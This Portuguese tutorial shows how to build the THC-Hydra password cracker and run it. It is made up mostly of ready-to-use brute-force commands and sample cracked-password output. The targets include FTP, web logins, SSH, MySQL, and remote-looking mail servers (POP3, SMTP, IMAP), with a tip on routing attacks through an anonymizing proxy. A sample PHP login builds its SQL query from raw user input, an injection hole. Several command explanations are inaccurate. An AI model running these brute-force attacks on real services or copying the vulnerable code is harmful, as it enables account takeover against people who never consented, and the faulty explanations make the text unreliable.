Documente Academic
Documente Profesional
Documente Cultură
################################################################################
2 de 10
[0x01] Compilando THC-HYDRA no Linux :
################################################################################
baixar source, descompacta , entra no diretrio criado :
-------------------------------------------------------------------------------$ wget http://www.thc.org/releases/hydra-7.1-src.tar.gz
$ tar -vzxf hydra-7.1-src.tar.gz
$ cd hydra-7.1-src/
-------------------------------------------------------------------------------Configuraes opcionais :
--disable-xhydra no compila o xhydra (hydra GUI)
--prefix=/opt/hydra diz onde vai ser instalado o hydra.
-------------------------------------------------------------------------------$ ./configure --disable-xhydra --prefix=/opt/hydra
-------------------------------------------------------------------------------compila, instala e cria link simblico :
-------------------------------------------------------------------------------# make && make install && ln -s /opt/hydra/hydra /usr/bin
-------------------------------------------------------------------------------Caso queira usar o pw-inspector criar um link simblico pra ele tambm :
-------------------------------------------------------------------------------# ln -s /opt/hydra/pw-inspector /usr/bin
--------------------------------------------------------------------------------
================================================================================
Bibliotecas suplementares THC-HYDRA no Linux :
================================================================================
Para usar mdulos como (ssh / mysql) preciso instalar bibliotecas suplementares.
Para o modulo mysql possvel instalar direto dos repositrios de qualquer
Debian-like.
-------------------------------------------------------------------------------# apt-get install libmysqlclient-dev
-------------------------------------------------------------------------------Para o modulo ssh segue os passos que usei no debian 6.
-------------------------------------------------------------------------------# apt-get install cmake openssl zlib build-essential
$ wget http://www.libssh.org/files/0.4/libssh-0.4.0.tar.gz
$ tar -vzxf libssh-0.4.0.tar.gz && cd libssh-0.4.0
$ mkdir build && cd build
$ cmake -DWITH_SSH1=ON -DCMAKE_BUILD_TYPE=Debug -DCMAKE_INSTALL_PREFIX=/usr ..
# make && make install
-------------------------------------------------------------------------------Depois basta compilar o hydra novamente :
-------------------------------------------------------------------------------$ wget http://www.thc.org/releases/hydra-7.1-src.tar.gz
$ tar -vzxf hydra-7.1-src.tar.gz
$ cd hydra-7.1-src/
$ ./configure --disable-xhydra --prefix=/opt/hydra
# make && make install
--------------------------------------------------------------------------------
================================================================================
PW-Inspector :
================================================================================
PW-Inspector um utilitrio que vem ao pacote Hydra e serve exclusivamente pra
tratar wordlists conforme os paramentos passados.
opes do 'pw-inspector' :
********************************************************************************
Options:
-i FILE
file to read passwords from (default: stdin)
-o FILE
file to write valid passwords to (default: stdout)
-m MINLEN minimum length of a valid password
-M MAXLEN maximum length of a valid password
-c MINSETS the minimum number of sets required (default: all given)
Sets:
-l
lowcase characters (a,b,c,d, etc.)
-u
upcase characters (A,B,C,D, etc.)
-n
numbers (1,2,3,4, etc.)
-p
printable characters (which are not -l/-n/-p, e.g. $,!,/,(,*, etc.)
3 de 10
-s
special characters - all others not withint the sets above
********************************************************************************
Segue as opes :
-i
-o
-m
-M
-c
Sets:
-l Caracteres minsculos (a,b,c,d, etc.)
-u Caracteres maisculos (A,B,C,D, etc.)
-n Nmeros (1,2,3,4, etc.)
-p Aqui so os caracteres que no se encaixam -l/-u/-n em so eles $,!,/,(,*, etc.)
-s Caracteres especiais - so todos que no encaixam em nenhum dos sets acima.
Exemplos :
Criar wordlist suja para o teste :
-------------------------------------------------------------------------------$ perl -le 'print map { ("a".."z", "A".."Z", 0..9)[rand 62] } 1..rand 10 for 1..100000' >> wordlist_suja.txt
-------------------------------------------------------------------------------Usando o pw-inspector pra filtrar a wordlist "suja" e redirecionar para um novo arquivo apenas
as senhas que possuam o comprimento >= 6 && comprimento <= 8.
-------------------------------------------------------------------------------$ pw-inspector -i wordlist_suja.txt -o wordlist_limpa.txt -m 6 -M 8
-------------------------------------------------------------------------------Redirecionando sada padro (stdout) para o sor ordenar.
-------------------------------------------------------------------------------$ pw-inspector -i wordlist_suja.txt -m 6 -M 8 | sort >> wordlist_limpa_sort.txt
-------------------------------------------------------------------------------Redirecionando contedo ordenado para a entrada padro (stdin) :
-------------------------------------------------------------------------------$ sort wordlist_suja.txt | pw-inspector -m 6 -M 8 >> wordlist_limpa_sort.txt
-------------------------------------------------------------------------------Para o prximo caso no sera possvel pegar nada se a wordlist_suja.txt foi criada
o script disponibilizado neste tutorial porque obriguei o pw-inspector a pegar
apenas as senhas que contenham os 2 sets
(nmeros e caracteres especiais que definitivamente no existe na wordlist).
-------------------------------------------------------------------------------$ sort wordlist_suja.txt | pw-inspector -m 4 -M 4 -c 2 -n -s
-------------------------------------------------------------------------------Se o nmero minimo fosse setado pra 1 pegaria as senhas que contenham o "set" -n (nmeros).
================================================================================
Tratando wordlist sem usar o PW-Inspector.
================================================================================
Particularmente prefiro tratar as wordlists sem usar o pw-inspector que no
atende as minhas necessidades.
Os exemplos abaixo usam comandos simples que qualquer usurio Linux deveria conhecer.
Juntando wordlists :
-------------------------------------------------------------------------------cat wordlist_1.txt wordlist_2.txt wordlist_3.txt >> wordlist_final.txt
-------------------------------------------------------------------------------Ordenando e removendo senhas duplicadas :
-------------------------------------------------------------------------------$ sort wordlist_suja.txt | uniq -u
-------------------------------------------------------------------------------Pegando senhas com o comprimento 2 a 4 contento apenas nmeros :
-------------------------------------------------------------------------------$ sort wordlist_suja.txt | grep -P "^[0-9]{6,8}$"
-------------------------------------------------------------------------------Pegando senhas [a-z0-9] com apenas 6 caracteres :
-------------------------------------------------------------------------------$ sort wordlist_suja.txt | grep -P "^[a-z0-9]{6}$"
-------------------------------------------------------------------------------Pegando senhas [a-zA-Z] com qualquer comprimento,removendo senhas duplicadas e
4 de 10
jogando o contedo para um novo arquivo chamado "wordlist_mdh3ll.txt"
-------------------------------------------------------------------------------$ sort wordlist_suja.txt | grep -P "^[a-zA-Z]*$" | uniq -u >> wordlist_mdh3ll.txt
ou
$ sort wordlist_suja.txt | grep -Pi "^[a-z]*$" | uniq -u >> wordlist_mdh3ll.txt
-------------------------------------------------------------------------------Pegando senhas que comece com "1" e termine com "w".
-------------------------------------------------------------------------------$ cat wordlist_suja.txt | grep -P "^1.*w$"
-------------------------------------------------------------------------------Convertendo caracteres maisculos para minsculos.
-------------------------------------------------------------------------------$ cat wordlist_suja.txt | tr '[:upper:]' '[:lower:]' >> wordlist_minusculo.txt
ou
$ perl -ne 'print lc $_' wordlist_suja.txt
-------------------------------------------------------------------------------================================================================================
Executando Hydra :
================================================================================
Rode 'hydra' no terminal:
********************************************************************************
Hydra v7.0 (c)2011 by van Hauser/THC & David Maciejak - for legal purposes only
Syntax: hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e ns] [-o FILE]
[-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-W TIME] [-f] [-s PORT]
[-x MIN:MAX:CHARSET] [-SuvV46] [server service [OPT]]|[service://server[:PORT][/OPT]]
Options:
-R
restore a previous aborted/crashed session
-S
perform an SSL connect
-s PORT
if the service is on a different default port, define it here
-l LOGIN or -L FILE login with LOGIN name, or load several logins from FILE
-p PASS or -P FILE try password PASS, or load several passwords from FILE
-x MIN:MAX:CHARSET password bruteforce generation, type "-x -h" to get help
-e ns
additional checks, "n" for null password, "s" try login as pass
-u
loop around users, not passwords (implied when using -x)
-C FILE
colon separated "login:pass" format, instead of -L/-P options
-M FILE
server list for parallel attacks, one entry per line
-o FILE
write found login/password pairs to FILE instead of stdout
-f
exit after the first found login/password pair (per host if -M)
-t TASKS run TASKS number of connects in parallel (default: 16)
-w / -W TIME waittime for responses (32s) / between connects per thread
-4 / -6
prefer IPv4 (default) or IPv6 addresses
-v / -V
verbose mode / show login+pass combination for each attempt
-U
service module usage details
server
the target server (use either this OR the -M option)
service
the service to crack. Supported protocols: cisco cisco-enable cvs ftp[s] http[s]-{head|get} http[s]-{get|post}-form http-proxy
OPT
some service modules need special input (use -U to see module help)
... ...
********************************************************************************
Podemos ver acima que quando executado exibe informaes como sintaxe,opes etc.
################################################################################
[0x02] Opes hydra :
################################################################################
-R
-S
-s
-l
-L
-p
-P
5 de 10
para qualquer outro use o caractere pertencente.
Exemplos :
-x 3:5:a
-x 5:8:A
-x 5:8:A1
-x 1:3:/
-x 1:3:/%,.-
Gera
Gera
Gera
Gera
Gera
senha
senha
senha
senha
senha
com
com
com
com
com
o
o
o
o
o
comprimento
comprimento
comprimento
comprimento
comprimento
[3-5]
[5-8]
[5-8]
[1-3]
[1-3]
################################################################################
[0x03] Exemplos:
################################################################################
Pratica das opes [0x02] deste tutorial.
================================================================================
Exemplo FTP
================================================================================
Sintaxe:
-------------------------------------------------------------------------------hydra -l root -P pass.txt -w 15 localhost ftp
-------------------------------------------------------------------------------__________________________________________________________
|________________________Terminal____________________|-|_|X|
||
||
|| mdh3ll@debian:~$ ftp
||
|| ftp> o
||
|| (to) localhost
||
|| Connected to localhost.
||
|| 220 ProFTPD 1.3.3d Server (ProFTPD) [::ffff:127.0.0.1] ||
|| Name (localhost:mdh3ll):
||
||
||
||________________________________________________________||
|__________________________________________________________|
Sada:
********************************************************************************
Hydra v7.0 (c)2011 by van Hauser/THC & David Maciejak - for legal purposes only
Hydra (http://www.thc.org/thc-hydra) starting at 2011-09-11 12:25:52
[DATA] 16 tasks, 1 server, 46 login tries (l:1/p:46), ~2 tries per task
[DATA] attacking service ftp on port 21
[21][ftp] host: 127.0.0.1
login: nobody
password: culture123
[STATUS] attack finished for localhost (waiting for children to finish)
6 de 10
1 of 1 target successfuly completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2011-09-11 12:25:53
********************************************************************************
Encontrou :
[21][ftp] host: 127.0.0.1
login: nobody
password: culture123
================================================================================
Exemplo http-head
================================================================================
Sintaxe:
-------------------------------------------------------------------------------hydra -L users.txt -P pass.txt -o out.txt localhost http-head /colt/
-------------------------------------------------------------------------------__________________________________________________________
|__Mozilla Firefox___________________________________|-|_|X|
||_http://localhost/colt/________________________________ ||
||
||
||
||
||
__________________________________________
||
||
|__Autenticao solicitada_______________|X|
||
||
|O servidor localhost:80 requer um nome de |
||
||
|usurio e senha.O servidor diz:colt user |
||
||
|
____________________ |
||
||
| nome de usurio: |_______mdh3ll_______| |
||
||
|
Senha: |___**************___| |
||
||
|
__________
_______ |
||
||
|___________________|_cancelar_|_|_login_|_|
||
||
||
||
||
||
||
||
||
||________________________________________________________||
|_Concludo________________________________________________|
Sada:
********************************************************************************
Hydra v7.0 (c)2011 by van Hauser/THC & David Maciejak - for legal purposes only
Hydra (http://www.thc.org/thc-hydra) starting at 2011-09-11 12:19:16
[DATA] 16 tasks, 1 server, 46 login tries (l:1/p:46), ~2 tries per task
[DATA] attacking service http-head on port 80
[80][www] host: 127.0.0.1
login: lampp
password: culture123
[STATUS] attack finished for localhost (waiting for children to finish)
1 of 1 target successfuly completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2011-09-11 12:19:16
********************************************************************************
O Hydra encontrou o e salvou no arquivo out.txt :
-------------------------------------------------------------------------------usuario:lampp senha:culture123
--------------------------------------------------------------------------------
================================================================================
Exemplo http-post-form
================================================================================
Sintaxe : <url>:<form parameters>:<condition string>[:<optional>[:<optional>]
http://127.0.0.1/login/index.html
-------------------------------------------------------------------------------<html>
<head><title>Login</title></head>
<body>
<form method="POST" action="logar.php">
<p> Nome </p></BR>
<input type="text" name="user"></br>
<p> Senha </p></BR>
<input type="password" name="pass"></br>
<input type="submit" name="enviar" value="Enviar">
</form>
</body>
</html>
--------------------------------------------------------------------------------
7 de 10
__________________________________________________________
|__Mozilla Firefox__________Login____________________|-|_|X|
||_http://127.0.0.1/login/index.html______________________ |
||
||
||
Nome
||
||
_____________________________________
||
||
|
|
||
||
|_____________________________________|
||
||
||
||
Senha
||
||
_____________________________________
||
||
|
|
||
||
|_____________________________________|
||
||
||
||
________________
||
||
|
Enviar
|
||
||
|________________|
||
||
||
||________________________________________________________||
|_Concludo________________________________________________|
logar.php ilustrativo :
-------------------------------------------------------------------------------<?
# logar.php ilustrativo
$user = $_POST['user'];
$pass = $_POST['pass'];
if($user == "admin" && $pass == "culture123"){
echo "Logado com sucesso!";
}else{
echo "Usuario ou senha invalida!";
}
?>
--------------------------------------------------------------------------------
Sada:
********************************************************************************
Hydra v7.0 (c)2011 by van Hauser/THC & David Maciejak - for legal purposes only
Hydra (http://www.thc.org/thc-hydra) starting at 2011-09-11 12:51:14
[DATA] 1 task, 1 server, 47 login tries (l:1/p:47), ~47 tries per task
[DATA] attacking service http-post-form on port 80
[80][www-form] host: 127.0.0.1
login: admin
password: culture123
[STATUS] attack finished for 127.0.0.1 (valid pair found)
1 of 1 target successfuly completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2011-09-11 12:51:14
********************************************************************************
Para obter mais detalhes execute : ./hydra -U http-post-form
================================================================================
Exemplo http-get-form
================================================================================
http-get-form vai seguir o mesmo modelo do http-post-form
-------------------------------------------------------------------------------# index.html ilustrativo (http://127.0.0.1/index.html)
<html>
8 de 10
<head><title>Login</title></head>
<body>
<form method="GET" action="enviar.php">
<p> Nome </p></BR>
<input type="text" name="tx_nome"></br>
<p> Senha </p></BR>
<input type="password" name="tx_senha"></br>
<input type="submit" name="go" value="Go">
</form>
</body>
</html>
--------------------------------------------------------------------------------------------------------------------------------------------------------------# enviar.php ilustrativo (http://127.0.0.1/enviar.php)
<?php
# eviar.php ilustrativo
require_once('conectar.php');
$user = $_GET['tx_nome'];
$pass = $_GET['tx_senha'];
$pass = md5($pass);
$pesquisa = MYSQL_QUERY("select usuario,senha from TBLogin where usuario = \"$user\" AND senha = \"$pass\"");
$resultado = mysql_num_rows($pesquisa);
if($resultado == 1){
echo "Logado com sucesso";
}else{
echo "Algo esta errado";
}
?>
-------------------------------------------------------------------------------Sintaxe completa fica assim :
-------------------------------------------------------------------------------hydra -l admin -P pass.txt -o out.txt -t 1 -f 127.0.0.1 http-get-form "enviar.php:user=^USER^&pass=^PASS^:Algo esta errado"
----------------------------------------------------------------------------------A nica mudana significativa a troca do modulo "http-post-form" por "http-get-form"
na sintaxe.
Para obter mais detalhes execute : ./hydra -U http-get-form
================================================================================
Exemplo POP3
================================================================================
Sintaxe:
-------------------------------------------------------------------------------hydra -L users.txt -p 123456 -S pop3.dominio.com pop3
-------------------------------------------------------------------------------Sada:
********************************************************************************
Hydra v5.4 (c) 2006 by van Hauser / THC - use allowed only for legal purposes.
Hydra (http://www.thc.org) starting at 2010-01-28 00:55:28
[DATA] 9 tasks, 1 servers, 9 login tries (l:9/p:1), ~1 tries per task
[DATA] attacking service pop3 on port 110
[STATUS] attack finished for pop3.xxx.com (waiting for childs to finish)
[110][pop3] host: pop3.dominio.com
login: user@dominio.com.br password: 123456
********************************************************************************
================================================================================
Exemplo SMTP
================================================================================
Sintaxe :
-------------------------------------------------------------------------------hydra -l admin@dominio.com -P pass.txt smtp.mail.dominio.com smtp
-------------------------------------------------------------------------------Sada:
********************************************************************************
Hydra v7.0 (c)2011 by van Hauser/THC & David Maciejak - for legal purposes only
Hydra (http://www.thc.org/thc-hydra) starting at 2011-10-11 15:06:54
[DATA] 4 tasks, 1 server, 4 login tries (l:1/p:4), ~1 try per task
[DATA] attacking service smtp on port 25
[25][smtp] host: xxx.xxx.xxx.xxx
login: admin@dominio.com
password: cabal12ea13
********************************************************************************
9 de 10
================================================================================
Exemplo IMAP
================================================================================
Sintaxe :
-------------------------------------------------------------------------------hydra -l nobody@dominio.com -P pass.txt -S imap.dominio.com imap
-------------------------------------------------------------------------------Sada:
********************************************************************************
Hydra v7.0 (c)2011 by van Hauser/THC & David Maciejak - for legal purposes only
Hydra (http://www.thc.org/thc-hydra) starting at 2011-10-11 20:46:33
[DATA] 5 tasks, 1 server, 5 login tries (l:1/p:5), ~1 try per task
[DATA] attacking service imap on port 993
[993][imap] host: xx.xxx.xx.xxx
login: nobody@dominio.com
password: love1234
[STATUS] attack finished for imap.dominio.com (waiting for children to finish)
1 of 1 target successfuly completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2011-10-11 20:46:37
********************************************************************************
================================================================================
Exemplo SSH
================================================================================
__________________________________________________________
|________________________Terminal____________________|-|_|X|
||
||
||mdh3ll@debian:~$ ssh teste@192.168.1.4
||
||The authenticity of host '192.168.1.4 (192.168.1.4)'\
||
|| can't be established.
||
||RSA key fingerprint is xx:xx:xx:xx:xx:xx:xx:xx:xx:xx:xx ||
||Are you sure you want to continue\
||
|| connecting (yes/no)? yes
||
||Warning: Permanently added '192.168.1.4' (RSA)\
||
|| to the list of known hosts.
||
||teste@192.168.1.4's password:
||
||________________________________________________________||
|__________________________________________________________|
Sintaxe :
-------------------------------------------------------------------------------hydra -l teste -x 6:6:1 -s 22 192.168.1.4 ssh
-------------------------------------------------------------------------------Sada :
********************************************************************************
Hydra (http://www.thc.org/thc-hydra) starting at 2011-10-13 16:44:47
[DATA] 16 tasks, 1 server, 1000000 login tries (l:1/p:1000000), ~62500 tries per task
[DATA] attacking service ssh on port 22
[22][ssh] host: 192.168.1.4
login: teste
password: 000138
[STATUS] attack finished for 192.168.1.4 (waiting for children to finish)
1 of 1 target successfuly completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2011-10-13 16:45:26
********************************************************************************
================================================================================
Exemplo MYSQL
================================================================================
Sintaxe :
-------------------------------------------------------------------------------hydra -l root -P pass.txt -t 4 127.0.0.1 mysql
-------------------------------------------------------------------------------********************************************************************************
Hydra (http://www.thc.org/thc-hydra) starting at 2011-10-14 19:09:23
[DATA] 4 tasks, 1 servers, 32 login tries (l:1/p:32), ~8 tries per task
[DATA] attacking service mysql on port 3306
[3306][mysql] host: 127.0.0.1
login: root
password: Password01
[STATUS] attack finished for 127.0.0.1 (waiting for childs to finish)
1 of 1 target successfuly completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2011-10-14 19:09:32
********************************************************************************
################################################################################
[0x04] Proxy:
################################################################################
10 de 10
Proxy web:
O uso de proxy no hydra se limita em definir uma nova varivel de ambiente
com nome relacionado ao contedo.
Proxy HTTP :
-------------------------------------------------------------------------------HYDRA_PROXY_HTTP="http://123.45.67.89:8080/"
-------------------------------------------------------------------------------Para qualquer outro use : HYDRA_PROXY_CONNECT
-------------------------------------------------------------------------------HYDRA_PROXY_CONNECT=proxy.anonymizer.com:8000
-------------------------------------------------------------------------------Com autentificao :
-------------------------------------------------------------------------------HYDRA_PROXY_AUTH="nome:senha"
-------------------------------------------------------------------------------pra saber se o proxy foi definido use echo $VARIAVEL_DEFINIDA no terminal :
-------------------------------------------------------------------------------$ echo HYDRA_PROXY_HTTP
$ echo HYDRA_PROXY_CONNECT
$ echo HYDRA_PROXY_AUTH
-------------------------------------------------------------------------------a sada deve retornar o contedo que voc definiu na varivel.
(Preserve os crditos do autor)